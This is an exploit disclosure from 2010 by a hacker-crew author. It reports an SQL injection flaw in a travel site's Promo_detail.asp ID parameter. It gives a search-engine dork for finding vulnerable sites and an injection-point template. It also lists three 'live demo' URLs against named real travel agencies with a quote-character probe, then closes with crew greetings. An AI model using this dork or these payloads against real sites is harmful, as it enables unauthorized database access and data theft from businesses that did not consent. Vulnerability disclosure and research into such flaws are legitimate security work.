Global Travel SQL Injection

`=======================================================  
Global Travel (Promo_detail.asp) SQL Injection Vulnerability  
=======================================================  
  
[+] Author : jos_ali_joe  
[+] Homepage : http://josalijoe.org/ & http://indonesiancoder.com/  
[+] Mail : josalijoe[at]yahoo[dot]com  
[+] Date : oktober 05,2010  
[+] Vendor : N/A  
[+] Dork : inurl:"Promo_detail.asp?id="  
  
---------------------------------------------------------------------------  
  
[$] ExPLo!T : http://www.example.com/promo_detail.asp?ID={sql injection}  
  
[$] L!ve Demo :  
  
[~] http://www.hollistertravel.com/promo_detail.asp?ID=95%27  
  
[~] http://www.spiritoftravel.com/promo_detail.asp?ID=31%27  
  
[~] http://www.stillcruisintravel.com/promo_detail.asp?ID=46%27  
  
---------------------------------------------------------------------------  
  
Thanks :  
  
./kaMtiEz – ibl13Z – Xrobot – tukulesto – N4ck0 – R3m1ck – jundab - asickboys- Vyc0d – Yur4kha  
  
./ArRay – akatsuchi – K4pt3N – Gameover – antitos – yuki – pokeng – ffadill - Aury – aphe-aphe - Alecs  
  
./Kiddies – pL4nkt0n – chaer newbie – andriecom – Abu_adam – Petimati - hakz – Virgi – Anharku – TeRRenJr  
  
Greets For :  
  
./Devilzc0de crew – Kebumen Cyber – Explore Crew – Indonesian Hacker  
  
My Team : ./Indonesian Coder  
  
  
  
  
  
  
  
  
  
`